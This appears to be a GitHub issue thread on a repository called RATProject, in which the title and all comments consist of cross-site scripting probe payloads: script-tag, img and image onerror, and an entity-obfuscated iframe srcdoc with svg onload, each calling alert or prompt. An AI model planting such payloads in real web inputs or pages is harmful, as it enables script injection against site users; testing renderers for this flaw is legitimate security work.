### ISSUE TITLE
<script>alert()</script>

### ISSUE THREAD

**Issue by hACKeROne-bug** [huynh044/RATProject#1]
<script>alert()</script>

**Comment by huynh044** [comment]
<image src =q onerror=prompt(8)>

**Comment by hACKeROne-bug** [comment]
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>

**Comment by hACKeROne-bug** [comment]
<img src=x onerror=alert(1)>
